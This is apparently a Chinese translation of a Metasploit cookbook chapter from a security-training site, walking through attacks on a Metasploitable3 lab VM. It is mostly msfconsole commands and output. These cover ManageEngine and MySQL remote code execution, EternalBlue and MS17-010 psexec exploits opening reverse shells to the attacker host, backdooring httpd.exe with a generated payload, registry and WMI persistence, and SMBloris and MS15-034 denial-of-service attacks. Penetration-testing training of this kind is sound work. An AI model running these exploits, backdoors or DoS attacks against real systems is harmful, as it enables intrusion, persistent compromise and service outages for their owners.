8 exploit/windows/http/desktopcentral_statusupdate_upload 2014-08-31 excellent Yes ManageEngine Desktop Central StatusUpdate Arbitrary File Upload
9 exploit/windows/http/manage_engine_opmanager_rce 2015-09-14 manual Yes ManageEngine OpManager Remote Code Execution
10 exploit/windows/http/manageengine_adshacluster_rce 2018-06-28 excellent Yes Manage Engine Exchange Reporter Plus Unauthenticated RCE
11 exploit/windows/http/manageengine_appmanager_exec 2018-03-07 excellent Yes ManageEngine Applications Manager Remote Code Execution
12 exploit/windows/http/manageengine_apps_mngr 2011-04-08 average No ManageEngine Applications Manager Authenticated Code Execution
13 exploit/windows/http/manageengine_connectionid_write 2015-12-14 excellent Yes ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability
14 exploit/windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution
msf5 exploit(multi/http/jenkins_script_console) >
複製代碼
msf5 exploit(multi/http/jenkins_script_console) > use exploit/windows/http/manageengine_connectionid_write
msf5 exploit(windows/http/manageengine_connectionid_write) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf5 exploit(windows/http/manageengine_connectionid_write) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/http/manageengine_connectionid_write) > exploit
[-] Exploit failed: The following options failed to validate: RHOSTS.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/http/manageengine_connectionid_write) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/http/manageengine_connectionid_write) > exploit
[*] Started HTTP reverse handler on http://192.168.177.143:8080
[*] Creating JSP stager
[*] Uploading JSP stager uBzAP.jsp...
[*] Executing stager...
[*] http://192.168.177.143:8080 handling request from 192.168.177.144; (UUID: tsqgh8zb) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 3 opened (192.168.177.143:8080 -> 192.168.177.144:49632) at 2019-04-26 17:39:09 +0800
[!] This exploit may require manual cleanup of '../webapps/DesktopCentral/jspf/uBzAP.jsp' on the target
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
複製代碼
五、利用公用服務
在漏洞攻擊時,有些服務跟目標上其餘大部分服務都有關係,而大多數是狀況下它們被忽視了。
準備工做
在本節中,咱們將利用目標環境中最多見和最容易被濫用的服務-Mysql。大多數狀況下,咱們能夠利用Mysql服務,由於它們是出於開發目的安裝的。忽略了一些安全加固。好比設置root密碼或者設置強密碼。
本節咱們將使用Metasploitable3做爲靶機
怎麼作
要利用目標的Mysql服務,咱們先使用MySQL枚舉模塊枚舉目標,而後使用Oracle MySQL for the Microsoft Windows Payload攻擊模塊獲取遠程主機的shell。
TIP:mysql_paylod模塊在新版的Metasploit中被移除了。不過你能夠從 https://www.exploit-db.com/download/16957下載這個模塊,放到Metasploit對應的模塊目錄中(/usr/share/metasploit-framework/modules/exploits/windows/mysql),修改代碼的前面幾行爲以下內容就行。
##
# $Id: mysql_payload.rb 11899 2011-03-08 22:42:26Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::MYSQL
include Msf::Exploit::CmdStager
複製代碼
枚舉:
msf5 auxiliary(admin/mysql/mysql_enum) > use auxiliary/admin/mysql/mysql_enum
msf5 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 auxiliary(admin/mysql/mysql_enum) > set USERNAME root
USERNAME => root
msf5 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.177.144
[*] 192.168.177.144:3306 - Running MySQL Enumerator...
[*] 192.168.177.144:3306 - Enumerating Parameters
[*] 192.168.177.144:3306 - MySQL Version: 5.5.20-log
[*] 192.168.177.144:3306 - Compiled for the following OS: Win64
[*] 192.168.177.144:3306 - Architecture: x86
[*] 192.168.177.144:3306 - Server Hostname: metasploitable3
[*] 192.168.177.144:3306 - Data Directory: c:\wamp\bin\mysql\mysql5.5.20\data\
[*] 192.168.177.144:3306 - Logging of queries and logins: OFF
[*] 192.168.177.144:3306 - Old Password Hashing Algorithm OFF
[*] 192.168.177.144:3306 - Loading of local files: ON
[*] 192.168.177.144:3306 - Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.168.177.144:3306 - Allow Use of symlinks for Database Files: YES
[*] 192.168.177.144:3306 - Allow Table Merge:
[*] 192.168.177.144:3306 - SSL Connection: DISABLED
[*] 192.168.177.144:3306 - Enumerating Accounts:
[*] 192.168.177.144:3306 - List of Accounts with Password Hashes:
[+] 192.168.177.144:3306 - User: root Host: localhost Password Hash:
[+] 192.168.177.144:3306 - User: root Host: 127.0.0.1 Password Hash:
[+] 192.168.177.144:3306 - User: root Host: ::1 Password Hash:
[+] 192.168.177.144:3306 - User: Host: localhost Password Hash:
[+] 192.168.177.144:3306 - User: root Host: % Password Hash:
[*] 192.168.177.144:3306 - The following users have GRANT Privilege:
[*] 192.168.177.144:3306 - User: root Host: localhost
[*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 - User: root Host: ::1
[*] 192.168.177.144:3306 - The following users have CREATE USER Privilege:
[*] 192.168.177.144:3306 - User: root Host: localhost
[*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 - User: root Host: ::1
[*] 192.168.177.144:3306 - User: root Host: %
[*] 192.168.177.144:3306 - The following users have RELOAD Privilege:
[*] 192.168.177.144:3306 - User: root Host: localhost
[*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 - User: root Host: ::1
[*] 192.168.177.144:3306 - User: root Host: %
[*] 192.168.177.144:3306 - The following users have SHUTDOWN Privilege:
[*] 192.168.177.144:3306 - User: root Host: localhost
[*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 - User: root Host: ::1
[*] 192.168.177.144:3306 - User: root Host: %
[*] 192.168.177.144:3306 - The following users have SUPER Privilege:
[*] 192.168.177.144:3306 - User: root Host: localhost
[*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 - User: root Host: ::1
[*] 192.168.177.144:3306 - User: root Host: %
[*] 192.168.177.144:3306 - The following users have FILE Privilege:
[*] 192.168.177.144:3306 - User: root Host: localhost
[*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 - User: root Host: ::1
[*] 192.168.177.144:3306 - User: root Host: %
[*] 192.168.177.144:3306 - The following users have PROCESS Privilege:
[*] 192.168.177.144:3306 - User: root Host: localhost
[*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 - User: root Host: ::1
[*] 192.168.177.144:3306 - User: root Host: %
[*] 192.168.177.144:3306 - The following accounts have privileges to the mysql database:
[*] 192.168.177.144:3306 - User: root Host: localhost
[*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 - User: root Host: ::1
[*] 192.168.177.144:3306 - User: root Host: %
[*] 192.168.177.144:3306 - Anonymous Accounts are Present:
[*] 192.168.177.144:3306 - User: Host: localhost
[*] 192.168.177.144:3306 - The following accounts have empty passwords:
[*] 192.168.177.144:3306 - User: root Host: localhost
[*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 - User: root Host: ::1
[*] 192.168.177.144:3306 - User: Host: localhost
[*] 192.168.177.144:3306 - User: root Host: %
[*] 192.168.177.144:3306 - The following accounts are not restricted by source:
[*] 192.168.177.144:3306 - User: root Host: %
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mysql/mysql_enum) >
複製代碼
進行攻擊:
msf5> use exploit/windows/mysql/mysql_payload
msf5 exploit(windows/mysql/mysql_payload) > show options
msf5 exploit(windows/mysql/mysql_payload) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/mysql/mysql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/mysql/mysql_payload) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/mysql/mysql_payload) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/mysql/mysql_payload) > exploit
[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:3306 - Checking target architecture...
[*] 192.168.177.144:3306 - Checking for sys_exec()...
[*] 192.168.177.144:3306 - sys_exec() already available, using that (override with FORCE_UDF_UPLOAD).
[*] 192.168.177.144:3306 - Command Stager progress - 1.47% done (1499/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress - 2.93% done (2998/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress - 4.40% done (4497/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress - 5.86% done (5996/102246 bytes)
......
[*] Sending stage (179779 bytes) to 192.168.177.144
[*] 192.168.177.144:3306 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:55358) at 2019-04-26 16:25:45 +0800
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
複製代碼
若是目標Mysql沒有設置root密碼,所以可使用 MySQL服務上傳shell並得到系統的遠程訪問權限。就像上面同樣。因此,永遠不要忘記對基礎服務進行滲透測試。即使你認爲不會有人傻到配置無密碼的服務。
六、MS17-010 永恆之藍 SMB遠程代碼執行Windows內核破壞
再次利用在信息收集和掃描階段收集的信息,特別是MS17-010 SMB RCE檢測輔助模塊的輸出信息,咱們能夠轉向下一個易受攻擊的服務。
準備工做
MS17-010 EthernalBlue SMB Remote Windows Kernel Pool Corruption攻擊模塊是Equation Group ETERNALBLUE的一部分。Equation Group ETERNALBLUE是FuzzBunch toolkit的一部分。由Shadow Brokrs從美國國家安全局(NSA)獲取並公開。ETERNALBLUE一般被認爲是由NSA開發。它利用srv.sys在處理SrvOs2FeaListSizeToNt的時候邏輯不正確致使越界拷貝從而形成緩衝區溢出,進而容許咱們執行任意命令。它在被公開後被用在WannaCry勒索軟件中進行攻擊。此漏洞會影響全部運行SMBv1服務且未更新SMB安全補丁的Windows計算機和Windows服務器。
怎麼作
載入ms17_010_eternalblue模塊,設置目標IP地址,設置Payload,而後執行攻擊
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:445 - Connecting to target for exploitation.
[+] 192.168.177.144:445 - Connection established for exploitation.
[+] 192.168.177.144:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.177.144:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.177.144:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.177.144:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.177.144:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
[*] 192.168.177.144:445 - 0x00000030 6b 20 31 k 1
[+] 192.168.177.144:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.177.144:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.177.144:445 - Sending all but last fragment of exploit packet
[*] 192.168.177.144:445 - Starting non-paged pool grooming
[+] 192.168.177.144:445 - Sending SMBv2 buffers
[+] 192.168.177.144:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.177.144:445 - Sending final SMBv2 buffers.
[*] 192.168.177.144:445 - Sending last fragment of exploit packet!
[*] 192.168.177.144:445 - Receiving response from exploit packet
[+] 192.168.177.144:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.177.144:445 - Sending egg to corrupted connection.
[*] 192.168.177.144:445 - Triggering free of corrupted buffer.
[*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:49655) at 2019-04-26 17:40:54 +0800
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
複製代碼
七、MS17-010 EternalRomance/EternalSynergy/EternalChampion
MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution攻擊模塊也可用於MS17-0101漏洞利用。並且比EnternalBlue更可靠,不過須要命名管道。
怎麼作
使用模塊ms17_010_psexec
msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/smb/ms17_010_psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:445 - Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.177.144:445 - Built a write-what-where primitive...
[+] 192.168.177.144:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.177.144:445 - Selecting PowerShell target
[*] 192.168.177.144:445 - Executing the payload...
[+] 192.168.177.144:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.177.144
[*] Meterpreter session 2 opened (192.168.177.143:4444 -> 192.168.177.144:62432) at 2019-04-28 09:37:48 +0800
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
複製代碼
八、安裝後門
獲取shell後,咱們若是須要確保能持久性的訪問目標系統,咱們須要安裝後門。
準備工做
經過以前的漏洞利用,咱們已經得到了與目標機的session,咱們將利用meterpreter session來安裝後門服務。這裏以httpd.exe爲例。
meterpreter > ps -S httpd.exe
Filtering on 'httpd.exe'
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
1304 1816 dcserverhttpd.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe
1816 472 dcserverhttpd.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe
3180 472 httpd.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe
3880 3180 httpd.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe
meterpreter >
複製代碼
接下來,咱們將利用windows註冊表持久性模塊安裝隨系統啓動的後門。
最後咱們將利用WMI( Windows Management Instrumentation )建立一個無文件後門。
怎麼作
一、不能在程序運行的時候安裝後門,因此先殺死進程
meterpreter > kill 3880
Killing: 3880
meterpreter >
複製代碼
二、將須要替換成後門的程序下載下來
meterpreter > download C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe
[*] Downloading: C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] Downloaded 21.00 KiB of 21.00 KiB (100.0%): C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] download : C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
meterpreter >
複製代碼
三、將會話退回到後臺,使用reverse_tcp攻擊載荷,使用generate生成後門文件。
msf5 exploit(windows/smb/ms17_010_psexec) > use payload/windows/x64/meterpreter/reverse_tcp
msf5 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -p Windows -x /root/httpd.exe -k -f exe -o /root/httpd-backdoored.exe
[*] Writing 29184 bytes to /root/httpd-backdoored.exe...
msf5 payload(windows/x64/meterpreter/reverse_tcp) >
複製代碼
關於generate的參數說明,能夠查看幫助信息
msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:
-E Force encoding
-O <opt> Deprecated: alias for the '-o' option
-P <opt> Total desired payload size, auto-produce approproate NOPsled length
-S <opt> The new section name to use when generating (large) Windows binaries
-b <opt> The list of characters to avoid example: '\x00\xff'
-e <opt> The encoder to use
-f <opt> Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
-h Show this message
-i <opt> The number of times to encode the payload
-k Preserve the template behavior and inject the payload as a new thread
-n <opt> Prepend a nopsled of [length] size on to the payload
-o <opt> The output file name (otherwise stdout)
-p <opt> The platform of the payload
-s <opt> NOP sled length.
-x <opt> Specify a custom executable file to use as a template
複製代碼
四、啓動一個監聽,監聽後門的反向鏈接,並使用expolit -j放到後臺運行
msf5 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.177.143:4444
msf5 exploit(multi/handler) >
複製代碼
五、切回以前的meterpreter session,上傳後門文件並重命名。
msf5 exploit(multi/handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > cd C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
meterpreter > mv httpd.exe httpd.exe.backup
meterpreter > upload /root/httpd-backdoored.exe
[*] uploading : /root/httpd-backdoored.exe -> httpd-backdoored.exe
[*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd-backdoored.exe -> httpd-backdoored.exe
[*] uploaded : /root/httpd-backdoored.exe -> httpd-backdoored.exe
meterpreter > mv httpd-backdoored.exe httpd.exe
meterpreter >
複製代碼
六、使用shell命令進入目標系統的shell,重啓wampapache服務。
meterpreter > shell
Process 1976 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\wamp\bin\apache\apache2.2.21\bin>net stop wampapache
net stop wampapache
The wampapache service is stopping.net sta
The wampapache service was stopped successfully.
C:\wamp\bin\apache\apache2.2.21\bin>net start wampapache
[*] Sending stage (206403 bytes) to 192.168.177.144
net start wampapache
The wampapache service is starting.
The wampapache service was started successfully.
複製代碼
你會發現,服務啓動後,返回了新的會話
C:\wamp\bin\apache\apache2.2.21\bin>[*] Meterpreter session 4 opened (192.168.177.143:4444 -> 192.168.177.144:63068) at 2019-04-28 10:32:44 +0800
[*] Sending stage (206403 bytes) to 192.168.177.144
[*] Meterpreter session 5 opened (192.168.177.143:4444 -> 192.168.177.144:63069) at 2019-04-28 10:32:59 +0800
....
msf5 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 meterpreter x86/windows NT AUTHORITY\SYSTEM @ METASPLOITABLE3 192.168.177.143:4444 -> 192.168.177.144:62506 (192.168.177.144)
4 meterpreter x64/windows NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3 192.168.177.143:4444 -> 192.168.177.144:63068 (192.168.177.144)
5 meterpreter x64/windows NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3 192.168.177.143:4444 -> 192.168.177.144:63069 (192.168.177.144)
msf5 exploit(multi/handler) >
複製代碼
七、使用Windows註冊表持久化模塊植入後門。咱們利用永恆之藍攻擊得到的會話進行後門植入操做。
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/registry_persistence
smsf5 exploit(windows/local/registry_persistence) > set SESSION 6
SESSION => 6
msf5 exploit(windows/local/registry_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/registry_persistence) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/local/registry_persistence) > set LPORT 9999
msf5 exploit(windows/local/registry_persistence) > exploit
[*] Generating payload blob..
[+] Generated payload, 5944 bytes
[*] Root path is HKCU
[*] Installing payload blob..
[+] Created registry key HKCU\Software\cPH3pG4G
[+] Installed payload blob to HKCU\Software\cPH3pG4G\q3jhQYTs
[*] Installing run key
[-] Exploit aborted due to failure: unknown: Could not install run key
msf5 exploit(windows/local/registry_persistence) >
複製代碼
這裏由於環境問題,並未植入成功。
八、若是成功,而後就能夠設置監聽,以便目標重啓的時候得到反向shell會話
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.177.143:9999
msf5 exploit(multi/handler) >
複製代碼
九、當目標機器重啓後,能夠得到會話
meterpreter > reboot
Rebooting...
複製代碼
十、利用WMI事件訂閱建立無文件後門
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/wmi_persistence
msf5 exploit(windows/local/wmi_persistence) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/wmi_persistence) > set CALLBACK_INTERVAL 60000 //設置回調時間爲1分鐘
CALLBACK_INTERVAL => 60000
msf5 exploit(windows/local/wmi_persistence) > set EVENT_ID_TRIGGER 4624 //設置事件ID
EVENT_ID_TRIGGER => 4624
msf5 exploit(windows/local/wmi_persistence) > set USERNAME_TRIGGER Administrator //設置用戶
USERNAME_TRIGGER => Administrator
msf5 exploit(windows/local/wmi_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
smsf5 exploit(windows/local/wmi_persistence) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/local/wmi_persistence) > set LPORT 4433
LPORT => 4433
msf5 exploit(windows/local/wmi_persistence) > exploit
[-] This module cannot run as System
複製代碼
十一、提示未成功,咱們可使用migrate將meterpreter shell進程進行進程遷移,就是將meterpreter shell進程遷移到相對穩定應用的進程裏。
msf5 exploit(windows/local/wmi_persistence) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
232 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
300 472 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
316 304 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
324 5624 explorer.exe x64 1 METASPLOITABLE3\vagrant C:\Windows\Explorer.EXE
.....
meterpreter > migrate -N explorer.exe //進程遷移不必定每次都能成功,能夠多試幾回
[*] Migrating from 1088 to 5624...
[*] Migration completed successfully.
meterpreter >
複製代碼
而後再次攻擊
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/local/wmi_persistence) > exploit
[*] Installing Persistence...
[+] - Bytes remaining: 12560
[+] - Bytes remaining: 4560
[+] Payload successfully staged.
[+] Persistence installed! Call a shell using "smbclient \\\\192.168.177.144\\C$ -U Administrator <arbitrary password>"
[*] Clean up Meterpreter RC file: /root/.msf4/logs/wmi_persistence/192.168.177.144_20190428.2114/192.168.177.144_20190428.2114.rc
msf5 exploit(windows/local/wmi_persistence) >
複製代碼
註銷目標機登陸,而後從新登陸,msfconsole這邊就會接收到回連的會話
[*] Meterpreter session 2 opened (192.168.177.143:4433 -> 192.168.177.144:49437) at 2019-04-28 12:27:54 +0800
msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
複製代碼
九、拒絕服務攻擊
拒絕服務攻擊一般是經過向目標機請求大量的資源或利用漏洞,形成拒絕服務攻擊,消耗目標機器性能,拒絕服務攻擊會致使合法用戶沒法訪問計算機服務或資源,甚至可能會致使服務或操做系統崩潰。
準備工做
SMBloris是一個已經存在了20 年的 Windows SMB 漏洞,此漏洞可致使拒絕服務攻擊( DoS ) , 使得大規模服務器癱瘓。影響全部版本的 SMB 協議以及全部Windows 2000 以後的系統版本。
怎麼作
一、在進行SMBloris拒絕服務攻擊以前,要先設置攻擊機的最大鏈接數。
root@osboxes:~# ulimit -n 65535
root@osboxes:~# ulimit -n
65535
root@osboxes:~#
複製代碼
二、而後使用smb_loris模塊來攻擊目標機機器
msf5 auxiliary(dos/smb/smb_loris) > set RHOST 192.168.177.144
RHOST => 192.168.177.144
msf5 auxiliary(dos/smb/smb_loris) > run
[*] Starting server...
[*] 192.168.177.144:445 - 100 socket(s) open
[*] 192.168.177.144:445 - 200 socket(s) open
[*] 192.168.177.144:445 - 300 socket(s) open
[*] 192.168.177.144:445 - 400 socket(s) open
[*] 192.168.177.144:445 - 500 socket(s) open
[*] 192.168.177.144:445 - 600 socket(s) open
[*] 192.168.177.144:445 - 700 socket(s) open
[*] 192.168.177.144:445 - 800 socket(s) open
[*] 192.168.177.144:445 - 900 socket(s) open
[*] 192.168.177.144:445 - 1000 socket(s) open
[!] 192.168.177.144:445 - At open socket limit with 1017 sockets open. Try increasing you system limits.
[*] 192.168.177.144:445 - 1017 socket(s) open
[*] 192.168.177.144:445 - Holding steady at 1017 socket(s) open
複製代碼
三、查看目標機器,咱們能夠看到因爲攻擊者發送了大量的SMB請求消耗了目標機的大量內存。每個 NBSS 鏈接能夠申請分配 128 KB 內存空間,在創建大量鏈接的狀況下能夠耗盡內存,達到拒絕服務的效果。
另外一個可怕的DoS攻擊是MS15-034HTTP協議棧請求處理拒絕服務。
若是Microsoft Windows 7, Windows 8, Windows Server 2008, or Windows Server 2012機器正在運行了存在MS15-034漏洞的IIS服務,那麼能夠利用這個漏洞致使目標服務器崩潰。
msf5 > use auxiliary/dos/http/ms15_034_ulonglongadd
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > exploit
[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) >
複製代碼
能夠看到,目標死機藍屏了。
相關實驗在線學習
第四章 Meterpreter (預告)
在本章中,咱們將學習如下內容:
一、瞭解Meterpreter核心命令
二、瞭解Meterpreter文件系統命令
三、瞭解Meterpreter網絡命令
四、瞭解Meterpreter系統命令
五、與目標創建多重通訊信道
六、Meterpreter反取證
七、屏幕和鍵盤監聽
八、使用 scraper Merterpreter腳本
九、使用 winenum 枚舉系統信息
十、自動化腳本
十一、Meterpreter資源腳本
十二、Meterpreter超時控制
1三、Meterpreter休眠控制
1四、Meterpreter傳輸
1五、註冊表操做
1六、加載框架插件
1七、API和Mixins
1八、Railgun——將Ruby轉換爲武器
1九、向Railgun中添加DLL和函數定義
20、劫持遠程VNC
2一、開啓遠程桌面
說明
原書:《Metasploit Penetration Testing Cookbook - Third Edition》
本文由合天網安實驗室編譯,轉載請註明來源。
關於合天網安實驗室
合天網安實驗室(www.hetianlab.com)-國內領先的實操型網絡安全在線教育平臺
真實環境,在線實操學網絡安全 ; 實驗內容涵蓋:系統安全,軟件安全,網絡安全,Web安全,移動安全,CTF,取證分析,滲透測試,網安意識教育等。
